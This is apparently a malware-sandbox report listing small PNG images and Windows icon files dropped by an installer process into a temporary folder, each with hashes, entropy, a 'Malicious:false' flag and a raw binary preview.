                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .................................|~..|..1|..2|..2|..2|..2|..2|..2|..2|..2|~. }.................BI..{..#..."..."..."..."..."..."..."...#... ....AcY[c.Y[c......-...>.. @.. @.. @.. @.. @.. @.. @.. @.. @...?...(..Z]n-Z]n-...-$B..#D..#D.."C..!C.."C..!B.."C.. A..!B..#D..#D...<.._g.M_g.M.../(G..#F.."E..?]..........Ur..<[......]x..$G..#F...A..bl.Obl.O.../(I.."G..,O..............................2T.."G...C..bm.Obm.O.../(K.. H..Qn..........Kh..............<^..#J..#J...E..bn.Obn.O.../(M...I..g.......k....G..$L..........3Z.."K..#L...G..bn.Obn.O.../'P...L..`~......g....L...L..........Qv...M.."O...J..bo.Obo.O.../'R.. P..Bh..........!Q...N..^}......Z}...O.."Q...L..bp.Obp.O.../'T.."T..%T..........r...*[..-[..Ot..h...9g..!S...N..bq.Obq.O.../'V.."V.. U..@i..........................6f..!U...P..bq.Obq.O...-'Y.."Y.."Y.. W..=h..................\...!X.."Y...S..br.Lbr.L...."P..!].."\.."\.. [..!Y..-a..3e..(_.. Z.."\.."]...M..^g~(^g~(....+N.B,_..)^..)^..)^..)_..(^..(^..)^..)^
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):786
                                                                                                                                                                                                                                                          Entropy (8bit):7.667079474837334
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7auxjxCwxayWi4r6JPSKu0G1dEnJrZkTAilExOZgaMGQC23gdHtCDswPoLrQJ:Yhgwu6JaPE8aK8GMZPPo3FlEpb6K
                                                                                                                                                                                                                                                          MD5:60B69382DCB4792F0853815F1C3DC793
                                                                                                                                                                                                                                                          SHA1:EF08278795D17F21D3BDE98A44CB5247E18FB6E3
                                                                                                                                                                                                                                                          SHA-256:884887A5D27E4B1F683CF9BA3549797E9F2ACD7763144839CF690C87E38D348A
                                                                                                                                                                                                                                                          SHA-512:115E4BC5A59F02C9F8B72541F256EE683A7FB2DF2F16C560894B83AF2141659553937FAE4FC0246561F7EAFB8E921A1A081F3BEA89825A32BABF96AF00880663
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.}._H.A......u*zu.^d...bV..b.).I.$.P.BP.a)......4..FT.=DXf.Y..f.QV...%!5M.<.\..L....P......33...A.y.z...,"...a....5.f.V....W.3\.vRce..H..c.:F.P2..W..,.v'.....an=zo}....H..J.Tk,`..$.aV$@.`.!.>.c...p..i{........(E..!...u90.b....}t.d....L.j.3..4..>}...re..D.W.:.a.!7.V..}{.:1.b.A.>.x.lr..E.y.......\2..&..:8rw@.Q..E..1.LEL....[....X....9p..tF..S.P...........)+...OCm9...?.`...<+...8.N..F...[ ......='..p.9...P........Ua@....1.>...>.(+L.M..HC.X)...H.......h.&.j..$......|..A.r......w...!..C......0..k#..,R...*7,9..............^...'A.>L.<..;.p.,......1..%.bb!?{.mt.....>{....E..dD.W..eZ....9)f....3..W..+Q.......p....v7.C...E...h.a..7}....Q..ME..n.+).p.U..7.%......46..'.S.J........h%.......H...!C'j.4}.7.3[|h.nQ....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.739434322498255
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:iStQidpNKcrw3FGbVzh8MgzemLqu+kqkng6dPEAaRAdViNSOC09YzmLk:i4xuNYBzh8MkeZLRkng6q/RWmSDKYzR
                                                                                                                                                                                                                                                          MD5:5782C8F6C70B8E884FCB822EEF286EBE
                                                                                                                                                                                                                                                          SHA1:66776EDD49D55F0F440FD5DCCF38FC27147076C2
                                                                                                                                                                                                                                                          SHA-256:C067BD4E1DDB1EDA87201D7BA65BEB416C56A9ED486D17454148E9A013A6BD32
                                                                                                                                                                                                                                                          SHA-512:70366DDABF05D4A60C6AE09266A4911CE61268DE7C3E83292A627344AC048A1510F46B48A566790B986AB1264E3FF38FBCC552A3E60A9249D7F1D12E44657CBD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .....................................................................................................................................................................),).....)().)()R....................................................),)JJMJ.kmk.)().989.................................................!$!.\Y\...101.kmk.....................................! !B!$!.)().wxw.........sqs.kik.RUR{9<9!................)()!!$!.RQR.................................cec.BEB.989.....),).)()................................................989.9<9.!$!.................................................xzx.{y{.)().),).........................................................)().101.........................................................)().),).........................................................!$!.)()ckmk.................................................JIJ.)()J....),).............................................ZYZ.)()s............101{Z]Z...........................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):586
                                                                                                                                                                                                                                                          Entropy (8bit):7.630848437869861
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7czkgzR/pOsg/sx7MiqeJACAHDTOipuwsOmA8PJO/Y7:xQgzRBX6e7nmC+puF9U/Y7
                                                                                                                                                                                                                                                          MD5:FA83ECDD6AFBEFE0DD30A620574872DE
                                                                                                                                                                                                                                                          SHA1:8B3299A9244809F9541BFFB7A1CCD8D58AB53EB0
                                                                                                                                                                                                                                                          SHA-256:9AEA100DC1DCFA58A542BD9294F67B454CFD8669CC199F6C43ECD9A4C3E99E1D
                                                                                                                                                                                                                                                          SHA-512:202937104E00E187A4CCB1D3D2352F19E1966E71DF015D1E5E529B3C148D4A91FCFF18C0D0A08CB23660962BEC06417D1EABD47D0F48A07A5DB22DFC4EB6048D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.RAk.`.~c;.U..x..._P0..).t./....":$.......2iuu......O...VH.A>..^..S.....l...H...........}... ....II.E..".$ID....`_X.5.e..q.....q..@RK.U..=..MUT^..!..!hC..X.^....v..RG..j..).&.q.0.oM....Ah..w.....PJgj.....U...^..?.a`......3_..]..)..{9.......P\).z...t.-......pB..Z.QZ).........>...O..C.....%.....O.>q.4....kS...{..... ..Ks.....v.N.....H.<.kb.;....U0f.G..J.._.......?.......q?..-...U....[3v....&.D.Q5.G...IY..7?o...C..,..%*.e.=..~.g.......D.X.Q..]........`+..W.J.^..y.Wm.._..,5....1.sXU.o..<._.....J..Wa.g7....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):6.401447563259091
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:GxwtVB49rxl+FrnlMxh8M2J382e416LZYuegYtTn2H:YwjBoxlyDlMxj2J3SC6uSuT2H
                                                                                                                                                                                                                                                          MD5:54C24D9A4A0FECA1E1732A2A800FAC29
                                                                                                                                                                                                                                                          SHA1:D089A770D1565011BF54CFF7DCD29885F5595340
                                                                                                                                                                                                                                                          SHA-256:3BD7E6C88BC3E06CF51817BBCB9CE14895D22A71E96E571F108110A33273FF59
                                                                                                                                                                                                                                                          SHA-512:B07A8DE23A7D69413BA31E7ADC81B9F0200D58F7F247F78E5453ABAF737FBAE35D60801E3A33AA2F62C27AEABC2F669CA38198111140BE989E2DD315F651BB56
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................#p-...0......E.........+...A.................................4.l...................z......%..J...............................5.v...... ...1......`.........................................6...]....-.R.K.u.5.H.#.6.=.j.,.L..m...".. f%.$S(.........)+A.:<..!....0I.1.?.`..1.A.+.C.f..9.V..W..............)f+.....12...............4g......\...p..*.9..z'...)...1...+..... .#.....$$M.&...F?..E?..&....@g......~...^....9.8.i.3.f...H.....'.%........m'><.2=..><..,.................~.#|!.@.R.?.R...1..g..DT;T.*.s..!..............w..D...........".a..............v...5......$q#.'.;...)...".........!v%.[.{.C.i...............'.......'..?..5u4.U.m...W...5... ..|.......|...........r........>...I.O.c.'x&.\fQ6H.Q.4.U..s*..l#...'...............!...!..g"...2.;.d.I.Z.TpKPaeU.XYK./($!.'.u..5...;...6..{"...&...;...:...-..7..),#.YaN.giZ.bhV.>C6......Z'.G.t...E...=..["...3...9...<.L.x."z1.....02*.X^N.\bQ.KPA.HK>.F_BLY.q.m.../.N..&.^..>.Y.....
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1001
                                                                                                                                                                                                                                                          Entropy (8bit):7.758725240902144
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:PLiyUaMQzTd2JxkVLDF0b5YPQfmCmGnX49:DFKmR6kVne5YPxCmEa
                                                                                                                                                                                                                                                          MD5:5B29258244BCAD93923044B9CA6349A1
                                                                                                                                                                                                                                                          SHA1:CC6CC6ABE4420DFA97552F5A1FF0DACA652AACE6
                                                                                                                                                                                                                                                          SHA-256:A7D4C1C8C6FCEC92068D60D0DEFBAA38EA75010D01EA753FC913749CC89E8FDF
                                                                                                                                                                                                                                                          SHA-512:AA8345E54E397D1AECE33F8CBE66B12AAB5F373109C787DE7C8C23BB0949A2B184CC1FB2E08CFA66F7374ABFD26EAA21D85857C74B67AEE31590A197971AF15C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.MS{L[u.=.{o.K{)miy..<G......sF.#..d..;F.#S.-:53.ht31n..BLD.0..9E.3,u.s!.2....W_./.....k.h8._.9...|.s.7(..!..D..&.g..m.9..D.......-..r..#....!.N.V.+U..tu#".!K2..........db|"}.?.[s\>....x.....1....T.......z....;......lgv.4.\...|~,...{....Mk........s...&To..y...H..........l.}m.h).....l.`k...@.O.....6$.N8[...k\"...m.'8....o....i..<......X.HM..Z.H..4R&.*.P.:k.7..?.zH.....9v.u.`..E..|Dy...UP3Z.5)..).~5.."..H....v...>..H.......f!u.iEF@.M..k..]......NM".1.K.....,....0(}Dl.%...D.D@"...hp^.C[.g.c@$..w_.K...B.&u`|..|..66.>@(...r.......`t......#....i...J..,.....T....oN.V...%.......H.n.v.%...i/.4D..)....w<".=...+ +.......Xw."....|...s.%..#/g5...8..@...l...........[.E&.`%...w......t.U....w99Z...A...F.v.:(M.O<..W..{x!.z4.*.)p.<.G..Z.X..A...tu........*n.n...9.hy..>...~o....i....1.....O...ZK......&.f=...*SW../`\M.......".Yds.R..:.CY...~+srI.@...E.?f...W...aI..,\Xyy.........u..G...{...D.P.....X-...k.b..D.Y^.........1....IEND.B`
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):306
                                                                                                                                                                                                                                                          Entropy (8bit):6.791105413587409
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPt+HkIXaZ6t6p1+yMqZZQZX08sIfahdKry9Ral0GykkCmgpF6PF2fp:6v/7PIXaZuC+y5Qe8T+NA0lk9pw2x
                                                                                                                                                                                                                                                          MD5:B61B5003FBBE118F371C4AD42F4EF520
                                                                                                                                                                                                                                                          SHA1:CA09B93D1185476243A5A6C91F72DE328E291F1B
                                                                                                                                                                                                                                                          SHA-256:A5535A95335D1898EE2496AA99725F4BD62B229A1AF776F6B237CAA553AF539F
                                                                                                                                                                                                                                                          SHA-512:D3CF0B4E5B2CEA3ECF3C88460B8D566F01C0F50F597D1ABFD0D5D42B0EBB749435BF89976BCCE1B89C19E22D1EBE574FA2DA93DA7D568B0B8D8CBAB0C7281191
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.cd...._....@...:........1.1`?.f.8p...@...o.g..l.n?b........{..i..<....AWW.....E.d..."..7[..\.0..l..5...}B...7...p.l..Dl.......@....0........p..l.z8.W...|..LH...fx.r.6.&`$es.LP..@.WRudPRqd....{................:..U.Dd.LL..^..d.!.h.....A.....n>7......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):786
                                                                                                                                                                                                                                                          Entropy (8bit):7.667079474837334
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7auxjxCwxayWi4r6JPSKu0G1dEnJrZkTAilExOZgaMGQC23gdHtCDswPoLrQJ:Yhgwu6JaPE8aK8GMZPPo3FlEpb6K
                                                                                                                                                                                                                                                          MD5:60B69382DCB4792F0853815F1C3DC793
                                                                                                                                                                                                                                                          SHA1:EF08278795D17F21D3BDE98A44CB5247E18FB6E3
                                                                                                                                                                                                                                                          SHA-256:884887A5D27E4B1F683CF9BA3549797E9F2ACD7763144839CF690C87E38D348A
                                                                                                                                                                                                                                                          SHA-512:115E4BC5A59F02C9F8B72541F256EE683A7FB2DF2F16C560894B83AF2141659553937FAE4FC0246561F7EAFB8E921A1A081F3BEA89825A32BABF96AF00880663
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.}._H.A......u*zu.^d...bV..b.).I.$.P.BP.a)......4..FT.=DXf.Y..f.QV...%!5M.<.\..L....P......33...A.y.z...,"...a....5.f.V....W.3\.vRce..H..c.:F.P2..W..,.v'.....an=zo}....H..J.Tk,`..$.aV$@.`.!.>.c...p..i{........(E..!...u90.b....}t.d....L.j.3..4..>}...re..D.W.:.a.!7.V..}{.:1.b.A.>.x.lr..E.y.......\2..&..:8rw@.Q..E..1.LEL....[....X....9p..tF..S.P...........)+...OCm9...?.`...<+...8.N..F...[ ......='..p.9...P........Ua@....1.>...>.(+L.M..HC.X)...H.......h.&.j..$......|..A.r......w...!..C......0..k#..,R...*7,9..............^...'A.>L.<..;.p.,......1..%.bb!?{.mt.....>{....E..dD.W..eZ....9)f....3..W..+Q.......p....v7.C...E...h.a..7}....Q..ME..n.+).p.U..7.%......46..'.S.J........h%.......H...!C'j.4}.7.3[|h.nQ....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):842
                                                                                                                                                                                                                                                          Entropy (8bit):7.696472050125109
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7MV8c2Qwrnehd6jw2pCreHWZJl2TKpwsC/eYvbojK1YOfjypI2Sc6jisxYw3Y:ycajeH61peeHauKVOFvbp7gb65Xm1
                                                                                                                                                                                                                                                          MD5:27858239558F8642F02A7770829F8325
                                                                                                                                                                                                                                                          SHA1:13BA5FC4427044C1343D62F4F9D552C6C62B18B6
                                                                                                                                                                                                                                                          SHA-256:C470C09448A1BFBDD59F53A6E4C563E9584FF8CA083895A4887ABBAA39EDB823
                                                                                                                                                                                                                                                          SHA-512:4E0A4AC0E33EA15BC546D56D552A3C1A8995DF8D319418D6E6CA066FC25CA8EB9E9A77F1373D4A7236BE1F5B0FE0DFEE9D62F3F559CFE3C0B2311FC0C830EA45
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.mSkHSa.~..9..Q.$.NQ1.2... Z.)+.H.4..K.R.......`..y..BfXV:..vQ,.()4..l.R......:.cf..9..{..y..y..|....B....E"Q.{a4....wuu.0G.g1...T*.WUU....f..Az..\.Z........u.'.QQQq....A ...q.0`.......A.W$.;.?R...fP.T..~...`........ ..M..x8kG.?.......' ',.c......dF.g..{zzZ#.H.[r'.P.XG....L......AGq+J.n.i.%444.`.....1nq.......+...\.....MS.@........|.><.....DOOO^bbb.+......u...0..../..>....&~..@......G......-].]h`.^vl.,d.....p...1(.O.M?........M.`ll......).X\..^'._!|...\.....x...?.........GGG....yIIIu..X....X$.....@.....%8..F.,.).....:7...q.m...-..).-..v.Ap*...\.mx.M......7.P(..5.t.zf.......R......i.....^~.n....5222.3..T[[....=[./`..0=....6~..?,.<I&X......X.n+...%...hX+..V..>...2C.c.4..(...s.Z.....s[y..Q"-))).........'L..3....i[.e2YHVVV.g.....i...q....N...W....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.042561065627236
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:Fw3//////oXgAo////////go/P/wK/////YTQRY9K///pLKe//v7WVh5y//ze2JW:7BQC9BDRClcc3TIVBw0CC/6upx8y/V
                                                                                                                                                                                                                                                          MD5:58BB5428EE336A048C0EAEDD11B08CBE
                                                                                                                                                                                                                                                          SHA1:E40B41DCE19B4CEE84943905ACC31F0B624A22DC
                                                                                                                                                                                                                                                          SHA-256:619AB6CC1EB6D48676BA555BFEC94798B8E043052967FAD42356E9D8BFCD08D9
                                                                                                                                                                                                                                                          SHA-512:1424FE21796F05B1BB963F857BE61BD805775BC5F56B1A5ADBA8372057AEAFE01ED559EE9F29212BB74D9A1BF90F4F44DCC27AE09D1A02A674094BF8D7FA2045
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .............................................................................................................................../............../......................................................./.............._.............................................._................/...........................................................................................O...........`...P...........o...........................0...... .........O...................0...................."...a..............p......................................................................./....+..1...q..............X..1..1..1..1..(............(...H...H.............H...H..........j...H................Z...`...`...j...........................s...M................p...w...w...w.........................`......`.............P...............|.........s...
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):586
                                                                                                                                                                                                                                                          Entropy (8bit):7.630848437869861
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7czkgzR/pOsg/sx7MiqeJACAHDTOipuwsOmA8PJO/Y7:xQgzRBX6e7nmC+puF9U/Y7
                                                                                                                                                                                                                                                          MD5:FA83ECDD6AFBEFE0DD30A620574872DE
                                                                                                                                                                                                                                                          SHA1:8B3299A9244809F9541BFFB7A1CCD8D58AB53EB0
                                                                                                                                                                                                                                                          SHA-256:9AEA100DC1DCFA58A542BD9294F67B454CFD8669CC199F6C43ECD9A4C3E99E1D
                                                                                                                                                                                                                                                          SHA-512:202937104E00E187A4CCB1D3D2352F19E1966E71DF015D1E5E529B3C148D4A91FCFF18C0D0A08CB23660962BEC06417D1EABD47D0F48A07A5DB22DFC4EB6048D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.RAk.`.~c;.U..x..._P0..).t./....":$.......2iuu......O...VH.A>..^..S.....l...H...........}... ....II.E..".$ID....`_X.5.e..q.....q..@RK.U..=..MUT^..!..!hC..X.^....v..RG..j..).&.q.0.oM....Ah..w.....PJgj.....U...^..?.a`......3_..]..)..{9.......P\).z...t.-......pB..Z.QZ).........>...O..C.....%.....O.>q.4....kS...{..... ..Ks.....v.N.....H.<.kb.;....U0f.G..J.._.......?.......q?..-...U....[3v....&.D.Q5.G...IY..7?o...C..,..%*.e.=..~.g.......D.X.Q..]........`+..W.J.^..y.Wm.._..,5....1.sXU.o..<._.....J..Wa.g7....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):675
                                                                                                                                                                                                                                                          Entropy (8bit):7.483904311870301
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7doMHmeia+juikJeSnm7XW6rJ5XUkABLVsHAVSjneDkMC1:Ao9La+juxnm55uLPs1
                                                                                                                                                                                                                                                          MD5:BD04877B6C91557B84463719664B0292
                                                                                                                                                                                                                                                          SHA1:6B5783097D914F8A463363843B8D24C6C933DDFE
                                                                                                                                                                                                                                                          SHA-256:B2FE786345D8E1802BAA576C0E359240EA2811BCAB1BADB433743792BB9FAA77
                                                                                                                                                                                                                                                          SHA-512:715C6079A00306A46E221C432336B1A4AD23DA6D8AB6BDE7D9F992DF162AAA04D9332D3BAF84DBD6CBA0D4160DE4DE773F266F556CBBEAA015A5D54DC078D33E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a...jIDATx.cd... 6.bQ(.+....o...#.+....gee..|...o...R.l;....{qg.....5...k.......Qy.)....r..8...4.c..=.Wo.u...8...........tb.J....s..^..S~..c...\..XPQQ.H......>..b......._V.+g..:.N]...........O....._`X.>.........o..&.".^....5..C.M........8y...3f..s..../_...a..>.@Q.PUU....-...6,.>...(.AJJj!..0.*,,....!...+ &&&.......xT.S...Z:HC...O.>../,X. .....l.%(...........m..F.W..N.*...:..SV>X...:q.DGF..@k.].XYYy..Cf..7.J(...e.``...p`.........~...../.....t..O.}P.W.....q....}...;*h.....e.....*...A..v.......L....~.. .&0s...{...i...fggO-,,.......={..$......333..3......Kkjj.@...~..kWW..K.N d.8<....;0...[.x5..\.'.i......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):6.401447563259091
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:GxwtVB49rxl+FrnlMxh8M2J382e416LZYuegYtTn2H:YwjBoxlyDlMxj2J3SC6uSuT2H
                                                                                                                                                                                                                                                          MD5:54C24D9A4A0FECA1E1732A2A800FAC29
                                                                                                                                                                                                                                                          SHA1:D089A770D1565011BF54CFF7DCD29885F5595340
                                                                                                                                                                                                                                                          SHA-256:3BD7E6C88BC3E06CF51817BBCB9CE14895D22A71E96E571F108110A33273FF59
                                                                                                                                                                                                                                                          SHA-512:B07A8DE23A7D69413BA31E7ADC81B9F0200D58F7F247F78E5453ABAF737FBAE35D60801E3A33AA2F62C27AEABC2F669CA38198111140BE989E2DD315F651BB56
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................#p-...0......E.........+...A.................................4.l...................z......%..J...............................5.v...... ...1......`.........................................6...]....-.R.K.u.5.H.#.6.=.j.,.L..m...".. f%.$S(.........)+A.:<..!....0I.1.?.`..1.A.+.C.f..9.V..W..............)f+.....12...............4g......\...p..*.9..z'...)...1...+..... .#.....$$M.&...F?..E?..&....@g......~...^....9.8.i.3.f...H.....'.%........m'><.2=..><..,.................~.#|!.@.R.?.R...1..g..DT;T.*.s..!..............w..D...........".a..............v...5......$q#.'.;...)...".........!v%.[.{.C.i...............'.......'..?..5u4.U.m...W...5... ..|.......|...........r........>...I.O.c.'x&.\fQ6H.Q.4.U..s*..l#...'...............!...!..g"...2.;.d.I.Z.TpKPaeU.XYK./($!.'.u..5...;...6..{"...&...;...:...-..7..),#.YaN.giZ.bhV.>C6......Z'.G.t...E...=..["...3...9...<.L.x."z1.....02*.X^N.\bQ.KPA.HK>.F_BLY.q.m.../.N..&.^..>.Y.....
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):2.89668669623498
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:dDWdAyhFGViosMZNrBK5aTeiVIrSXgXdaguWUl:hxyTGVihMPBK52edrSXgtbUl
                                                                                                                                                                                                                                                          MD5:2102DF54739C5E5FFEDDA31CE18A430E
                                                                                                                                                                                                                                                          SHA1:B62D93ED6661FE4E0080D7CD575D0F81E8640D9B
                                                                                                                                                                                                                                                          SHA-256:2DFDE998FEAC91E72BFDCDDF174000539C525233D4E3EA4744BD08EF70E6C9C0
                                                                                                                                                                                                                                                          SHA-512:654F18D0C0F4309A8C559E4E0CB2D4497AABE9D9D5BDC51EA100CAF0455FC26702E0AA8390B3D7113CD7F752391B9A3283491B5A1623E0060F302EF2A816B7ED
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ............................"...........................................................".......................................................................................................................................................................................................................@.@.............9.9.............................................................................................................................................................................................................................................................................................................................................................................................................................H.H.........................................I.I.....................^.^.................................^.^.......................................................!.!...........................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):318
                                                                                                                                                                                                                                                          Entropy (8bit):6.697181871409298
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+aWg7NSRAkPY+kW37wjNaI79UL00H3zSiw2p:6v/78/2VRZbW37wV9UL00N
                                                                                                                                                                                                                                                          MD5:E472E7B1F2BF2829B8625C32CB02B0A8
                                                                                                                                                                                                                                                          SHA1:49275242752EEC7DFB1ED14A2968F02439EAE54D
                                                                                                                                                                                                                                                          SHA-256:FA0F63928ABF3B36BE9D310A257CABD413B7E7B7D7D92A0975C7FAA7CB2F370E
                                                                                                                                                                                                                                                          SHA-512:02E865BF6802EF4B3851E87A3E0C984395D5A90FFD7C6282F858E8ED2A74769BD968C637ABCC710BE3290CD0D947FBC5620FBA3510CB3ABB29991278F20C44B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.paint.net 4.0.134.[z....IDAT8O....P...J...@ ... ....Hv.@v.D%........`....M^.=Mh8.4.{i.6....8...m.c@.....a..q...l...'..c...R.Aas.qJg1.......;1.....~.....b.....{u.dt...^.....`..:72..Ru'..2..4_......].....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):6.511795576297305
                                                                                                                                                                                                                                                          Encrypted:false
